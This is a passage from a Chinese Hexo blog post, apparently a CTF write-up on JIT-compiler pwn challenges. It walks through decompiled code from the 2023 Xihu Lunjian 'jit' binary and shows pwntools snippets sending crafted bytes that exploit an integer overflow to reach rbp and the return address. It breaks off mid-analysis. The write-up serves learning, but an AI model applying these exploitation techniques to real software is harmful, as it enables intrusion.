

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="l1s00t">
  <meta name="keywords" content="">
  
    <meta name="description" content="jit-pwn这次wmctf有一道jit相关的pwn，这已经是笔者第二次遇到jit相关的pwn了，上一次是西湖论剑线上赛。 jit（Just-In-Time Compilation，即时编译）是一种在程序运行时将代码从高级语言（如Java、C#等）转换为机器代码的技术。与传统的静态编译（在编译时将代码转换为机器代码）不同，JIT编译在程序第一次运行时动态地将代码编译为机器代码，然后直接执行。这种方">
<meta property="og:type" content="article">
<meta property="og:title" content="jit-pwn">
<meta property="og:url" content="http://example.com/2023/08/23/jit-pwn/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="jit-pwn这次wmctf有一道jit相关的pwn，这已经是笔者第二次遇到jit相关的pwn了，上一次是西湖论剑线上赛。 jit（Just-In-Time Compilation，即时编译）是一种在程序运行时将代码从高级语言（如Java、C#等）转换为机器代码的技术。与传统的静态编译（在编译时将代码转换为机器代码）不同，JIT编译在程序第一次运行时动态地将代码编译为机器代码，然后直接执行。这种方">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230823234526766.png">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230823234653893.png">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230823235053564.png">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230826145254196.png">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230826145745233.png">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230826222817965.png">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230826224341966.png">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230826225026364.png">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230826230005769.png">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230827231817064.png">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230827232559934.png">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230826230155195.png">
<meta property="og:image" content="http://example.com/img/jit-pwn/image-20230826230249320.png">
<meta property="article:published_time" content="2023-08-23T15:17:17.000Z">
<meta property="article:modified_time" content="2023-08-28T09:37:07.033Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="jit">
<meta property="article:tag" content="知识点总结">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/jit-pwn/image-20230823234526766.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>jit-pwn - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>l1s00t</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="jit-pwn"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-08-23 23:17" pubdate>
          2023年8月23日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          14k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          57 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">jit-pwn</h1>
            
              <p class="note note-info">
                
                  
                    本文最后更新于：2023年8月28日 下午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="jit-pwn"><a href="#jit-pwn" class="headerlink" title="jit-pwn"></a>jit-pwn</h1><p>这次wmctf有一道jit相关的pwn，这已经是笔者第二次遇到jit相关的pwn了，上一次是西湖论剑线上赛。</p>
<p><strong>jit（Just-In-Time Compilation，即时编译）</strong>是一种在程序运行时将代码从高级语言（如Java、C#等）转换为机器代码的技术。与传统的静态编译（在编译时将代码转换为机器代码）不同，JIT编译在程序第一次运行时动态地将代码编译为机器代码，然后直接执行。这种方法有助于提高程序的性能和优化执行速度。</p>
<p>jit-pwn与vm-pwn有些相似之处，都是通过逆向得到指令码。不同的是，vm-pwn通常输入的是字节码，而jit-pwn输入的是汇编源码，所以一般包含<strong>源码 -&gt; 字节码</strong>的过程。</p>
<h2 id="2023-西湖论剑-jit"><a href="#2023-西湖论剑-jit" class="headerlink" title="2023-西湖论剑-jit"></a>2023-西湖论剑-jit</h2><p>这道题是用c++实现的jit，能够解释部分字节码。这道题程序很大，但是没有去掉符号表。</p>
<p>程序保护全开。</p>
<p><img src="/img/jit-pwn/image-20230823234526766.png" srcset="/img/loading.gif" lazyload alt="image-20230823234526766"></p>
<p>这里程序主逻辑还是比较简单的。</p>
<p><img src="/img/jit-pwn/image-20230823234653893.png" srcset="/img/loading.gif" lazyload alt="image-20230823234653893"></p>
<p>程序一开始读取输入，然后赋值到IRstream中，再调用Compiler::main对输入的指令进行翻译。</p>
<p><code>Compiler::main</code></p>
<p><img src="/img/jit-pwn/image-20230823235053564.png" srcset="/img/loading.gif" lazyload alt="image-20230823235053564"></p>
<p>这个函数调用了很多自定义函数，这里我们从上到下逐个分析。</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-function"><span class="hljs-type">void</span> __cdecl <span class="hljs-title">JITHelper::init</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>  JITHelper::execbuf = (<span class="hljs-type">char</span> *)<span class="hljs-built_in">mmap</span>(<span class="hljs-number">0LL</span>, <span class="hljs-number">0x2000</span>uLL, <span class="hljs-number">7</span>, <span class="hljs-number">34</span>, <span class="hljs-number">-1</span>, <span class="hljs-number">0LL</span>);<br>  JITHelper::exec_wr = JITHelper::execbuf;<br>  <span class="hljs-built_in">memset</span>(JITHelper::execbuf, <span class="hljs-number">0xCC</span>, <span class="hljs-number">0x2000</span>uLL);<br>&#125;<br><br><span class="hljs-function"><span class="hljs-type">void</span> *__cdecl <span class="hljs-title">JITHelper::nowptr</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>  <span class="hljs-keyword">return</span> JITHelper::exec_wr;<br>&#125;<br><br><span class="hljs-function"><span class="hljs-type">void</span> __cdecl <span class="hljs-title">JITHelper::write</span><span class="hljs-params">(std::string *p_payload)</span></span><br><span class="hljs-function"></span>&#123;<br>  <span class="hljs-type">size_t</span> v1; <span class="hljs-comment">// rbx</span><br>  <span class="hljs-type">const</span> <span class="hljs-type">void</span> *v2; <span class="hljs-comment">// rax</span><br><br>  <span class="hljs-keyword">if</span> ( JITHelper::total_wr &gt; <span class="hljs-number">0x1900</span> )<br>    <span class="hljs-built_in">fatal</span>();<br>  v1 = std::string::<span class="hljs-built_in">size</span>(p_payload);<br>  v2 = (<span class="hljs-type">const</span> <span class="hljs-type">void</span> *)std::string::<span class="hljs-built_in">data</span>(p_payload);<br>  <span class="hljs-built_in">memcpy</span>(JITHelper::exec_wr, v2, v1);<br>  JITHelper::exec_wr += std::string::<span class="hljs-built_in">size</span>(p_payload);<br>  JITHelper::total_wr += std::string::<span class="hljs-built_in">size</span>(p_payload);<br>&#125;<br><br><span class="hljs-function"><span class="hljs-type">bool</span> __cdecl <span class="hljs-title">IRstream::empty</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>  <span class="hljs-keyword">return</span> std::string::<span class="hljs-built_in">size</span>(&amp;IRstream::ir[abi:cxx11]) == IRstream::pos;<br>&#125;<br><br><span class="hljs-function"><span class="hljs-type">void</span> __cdecl <span class="hljs-title">JITHelper::finailize</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>  <span class="hljs-built_in">mprotect</span>(JITHelper::execbuf, <span class="hljs-number">0x2000</span>uLL, <span class="hljs-number">5</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p><code>JITHelper::init</code> 调用<code>mmap</code> 分配一段可读可写可执行的内存，<strong>exec_wr</strong>指向内存起始地址，然后初始化为0xCC，即<code>int 80h</code>。再将内存起始地址赋值给<strong>entry</strong>。初始化<strong>p_payload</strong>，并写入<code>mmap</code> 分配的空间。可以看到，写入的是一段字节码。然后，判断IRStream是否为空，并调用<code>Compiler::handleFn</code>，这个函数是一个关键函数，我们后续再进行分析。最后调用<code>JITHelper::finailize</code>，去掉已分配空间的可写权限。</p>
<p><img src="/img/jit-pwn/image-20230826145254196.png" srcset="/img/loading.gif" lazyload alt="image-20230826145254196"></p>
<p><img src="/img/jit-pwn/image-20230826145745233.png" srcset="/img/loading.gif" lazyload alt="image-20230826145745233"></p>
<p>最后，这段代码看起来比较复杂。主要是判断三个条件，判断函数个数是否为空，函数参数个数是否为空，以及第一个函数的起始地址是否等于entry + boot。说白了，就是要求第一个函数参数为空，且起始地址在正确。然后调用<code>Compiler::clrstk</code>开辟了一小段栈空间，最后执行<strong>entry</strong>，也即<code>JITHelper::exebuf</code>。</p>
<p>分析到这儿，我们差不多可以理解程序的含义了。接下来，我们详细分析指令翻译的过程，即将汇编语言转换为字节码的部分。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">void</span> __cdecl <span class="hljs-title function_">Compiler::handleFn</span><span class="hljs-params">()</span><br>&#123;<br>  u8 id; <span class="hljs-comment">// [rsp+5h] [rbp-13h] BYREF</span><br>  u8 args; <span class="hljs-comment">// [rsp+6h] [rbp-12h]</span><br>  u8 locals; <span class="hljs-comment">// [rsp+7h] [rbp-11h]</span><br>  <span class="hljs-type">unsigned</span> __int64 v3; <span class="hljs-comment">// [rsp+8h] [rbp-10h]</span><br><br>  v3 = __readfsqword(<span class="hljs-number">0x28</span>u);<br>  <span class="hljs-keyword">if</span> ( IRstream::getop() != <span class="hljs-number">0xFF</span> )<br>    fatal();<br>  id = IRstream::getop();<br>  <span class="hljs-keyword">if</span> ( <span class="hljs-built_in">std</span>::<span class="hljs-built_in">unordered_map</span>&lt;<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span>,Compiler::func&gt;::count(&amp;Compiler::funcs, &amp;id) )<br>    fatal();<br>  args = IRstream::getop();<br>  locals = IRstream::getop();<br>  Compiler::creatFunc(id, args, locals);<br>&#125;<br><br><span class="hljs-type">void</span> __cdecl <span class="hljs-title function_">Compiler::creatFunc</span><span class="hljs-params">(u8 id, u8 args, u8 locals)</span><br>&#123;<br>  u8 ida[<span class="hljs-number">16</span>]; <span class="hljs-comment">// [rsp+Ch] [rbp-7Ch] BYREF</span><br>  <span class="hljs-type">int</span> retidx; <span class="hljs-comment">// [rsp+1Ch] [rbp-6Ch]</span><br>  Compiler::func __y; <span class="hljs-comment">// [rsp+20h] [rbp-68h] BYREF</span><br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">pair</span>&lt;<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> <span class="hljs-type">const</span>,Compiler::func&gt; __x; <span class="hljs-comment">// [rsp+30h] [rbp-58h] BYREF</span><br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> p_payload; <span class="hljs-comment">// [rsp+50h] [rbp-38h] BYREF</span><br>  <span class="hljs-type">unsigned</span> __int64 v9; <span class="hljs-comment">// [rsp+78h] [rbp-10h]</span><br><br>  ida[<span class="hljs-number">0</span>] = id;<br>  v9 = __readfsqword(<span class="hljs-number">0x28</span>u);<br>  <span class="hljs-keyword">if</span> ( args &gt; <span class="hljs-number">8u</span> || locals &gt; <span class="hljs-number">0x20</span>u )<br>    fatal();<br>  __y.id = ida[<span class="hljs-number">0</span>];<br>  __y.args = args;<br>  __y.locals = locals;<br>  __y.base = JITHelper::nowptr();<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">pair</span>&lt;<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> <span class="hljs-type">const</span>,Compiler::func&gt;::<span class="hljs-built_in">pair</span>&lt;<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> &amp;,Compiler::func,<span class="hljs-literal">true</span>&gt;(&amp;__x, ida, &amp;__y);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">unordered_map</span>&lt;<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span>,Compiler::func&gt;::insert(&amp;Compiler::funcs, &amp;__x);<br>  <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::allocator(&amp;__x);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::basic_string(&amp;p_payload, &amp;unk_59E0, &amp;__x);<br>  JITHelper::write(&amp;p_payload);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::~<span class="hljs-built_in">string</span>(&amp;p_payload);<br>  <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::~allocator(&amp;__x);<br>  JITHelper::bwrite&lt;<span class="hljs-type">int</span>&gt;(<span class="hljs-number">8</span> * locals);<br>  Compiler::ctx_args = args;<br>  Compiler::ctx_locals = locals;<br>  retidx = Compiler::handleFnBody();<br>  AsmHelper::func_ret(locals, retidx);<br>&#125;<br><br><span class="hljs-type">void</span> __cdecl <span class="hljs-title function_">AsmHelper::func_ret</span><span class="hljs-params">(u8 locals, <span class="hljs-type">char</span> retidx)</span><br>&#123;<br>  <span class="hljs-type">char</span> v2; <span class="hljs-comment">// [rsp+1Fh] [rbp-39h] BYREF</span><br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> p_payload; <span class="hljs-comment">// [rsp+20h] [rbp-38h] BYREF</span><br>  <span class="hljs-type">unsigned</span> __int64 v4; <span class="hljs-comment">// [rsp+48h] [rbp-10h]</span><br><br>  v4 = __readfsqword(<span class="hljs-number">0x28</span>u);<br>  <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::allocator(&amp;v2);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::basic_string(&amp;p_payload, &amp;unk_59BB, &amp;v2);<br>  JITHelper::write(&amp;p_payload);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::~<span class="hljs-built_in">string</span>(&amp;p_payload);<br>  <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::~allocator(&amp;v2);<br>  JITHelper::bwrite&lt;<span class="hljs-type">int</span>&gt;(<span class="hljs-number">8</span> * locals);<br>  AsmHelper::var2reg(retidx);<br>  <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::allocator(&amp;v2);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::basic_string(&amp;p_payload, &amp;unk_59BF, &amp;v2);<br>  JITHelper::write(&amp;p_payload);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::~<span class="hljs-built_in">string</span>(&amp;p_payload);<br>  <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::~allocator(&amp;v2);<br>&#125;<br></code></pre></td></tr></table></figure>

<p><code>Compiler::handleFn</code> 函数创建函数，并规定函数起始字节为<strong>0xff</strong>。接着调用<code>IRstream::getop()</code> 从我们输入的指令中获取创建的函数<strong>id</strong>、<strong>args</strong>以及<strong>locals</strong>，并调用<code> Compiler::creatFunc</code>，对我们创建的函数进行一些初始化操作，比如根据局部变量个数开辟栈空间。接着，调用<code>Compiler::handleFnBody</code>进行详细处理。最后调用<code>AsmHelper::func_ret</code>，该函数对<code>handleFnBody</code>的返回值进行了处理，并写入函数结束操作。</p>
<p><img src="/img/jit-pwn/image-20230826222817965.png" srcset="/img/loading.gif" lazyload alt="image-20230826222817965"></p>
<p>我们先来看最简单的部分，当opcode为0时，调用<code>Compiler::var2idx</code> 并返回。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">char</span> __cdecl <span class="hljs-title function_">Compiler::var2idx</span><span class="hljs-params">(u8 varib)</span><br>&#123;<br>  u8 variba; <span class="hljs-comment">// [rsp+Ch] [rbp-1Ch]</span><br><br>  <span class="hljs-keyword">if</span> ( (varib &amp; <span class="hljs-number">0x7F</span>) == <span class="hljs-number">0</span> )                    <span class="hljs-comment">// 后7位不为0</span><br>    fatal();<br>  <span class="hljs-keyword">if</span> ( (varib &amp; <span class="hljs-number">0x80</span>u) == <span class="hljs-number">0</span> )                   <span class="hljs-comment">// 第8位为0</span><br>  &#123;<br>    <span class="hljs-keyword">if</span> ( varib &gt; Compiler::ctx_args )<br>      fatal();<br>    <span class="hljs-keyword">if</span> ( (<span class="hljs-type">char</span>)(<span class="hljs-number">8</span> * varib) &lt;= <span class="hljs-number">0</span> )<br>      fatal();<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">8</span> * varib;<br>  &#125;<br>  <span class="hljs-keyword">else</span>                                          <span class="hljs-comment">// 第8位不为0</span><br>  &#123;<br>    variba = varib ^ <span class="hljs-number">0x80</span>;<br>    <span class="hljs-keyword">if</span> ( (<span class="hljs-type">unsigned</span> __int8)(varib ^ <span class="hljs-number">0x80</span>) &gt; Compiler::ctx_locals )<br>      fatal();<br>    <span class="hljs-keyword">if</span> ( (<span class="hljs-type">char</span>)(<span class="hljs-number">-8</span> * variba) &gt; <span class="hljs-number">0</span> )<br>      fatal();<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">-8</span> * variba;<br>  &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>可以看出，返回的值根据第8位是否为0，而做不同的处理，实际上就是符号数那一套。这里通过对比，可以发现，当符号数为1时，返回值可以为0。</p>
<p>这里对该指令操作进行简单的测试。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">dbg(<span class="hljs-string">&#x27;b *$rebase(0x24ff)&#x27;</span>)<br><br>data = <span class="hljs-built_in">bytes</span>([<span class="hljs-number">0xff</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x20</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x81</span>])<br>p.send(data)<br></code></pre></td></tr></table></figure>

<p><img src="/img/jit-pwn/image-20230826224341966.png" srcset="/img/loading.gif" lazyload alt="image-20230826224341966"></p>
<p>这里可以看出，上述variba是对<strong>rbp</strong>偏移的处理。</p>
<p>这里存在一个整型溢出漏洞，可以通过溢出使得<strong>rbp</strong>为0，从而直接操作<strong>rbp</strong>，从而控制函数返回地址。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">dbg(<span class="hljs-string">&#x27;b *$rebase(0x24ff)&#x27;</span>)<br><br>data = <span class="hljs-built_in">bytes</span>([<span class="hljs-number">0xff</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x20</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x80</span> | <span class="hljs-number">0x20</span>])<br>p.send(data)<br></code></pre></td></tr></table></figure>

<p><img src="/img/jit-pwn/image-20230826225026364.png" srcset="/img/loading.gif" lazyload alt="image-20230826225026364"></p>
<p>剩下的指令也是类似的操作，通过调试，梳理出大致的汇编指令。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">case</span> <span class="hljs-number">1u</span>:                                  		<span class="hljs-comment">// movabs rsi,imm</span><br>                                                <span class="hljs-comment">// lea    rdi,[rbp-0x8]</span><br>                                                <span class="hljs-comment">// mov    QWORD PTR [rdi],rsi</span><br>        v2 = IRstream::getop();<br>        var = Compiler::var2idx(v2);<br>        imm = IRstream::getimm();<br>        AsmHelper::imm2var(var, imm);<br>        <span class="hljs-keyword">break</span>;<br>      <span class="hljs-keyword">case</span> <span class="hljs-number">2u</span>:                                  <span class="hljs-comment">// lea    rdi,[rbp-id1]</span><br>                                                <span class="hljs-comment">// mov    rsi,QWORD PTR [rdi]</span><br>                                                <span class="hljs-comment">// lea    rdi,[rbp-id2]</span><br>                                                <span class="hljs-comment">// mov    QWORD PTR [rdi],rsi</span><br>        v3 = IRstream::getop();<br>        var1 = Compiler::var2idx(v3);<br>        v4 = IRstream::getop();<br>        var2 = Compiler::var2idx(v4);<br>        AsmHelper::var2reg(var2);<br>        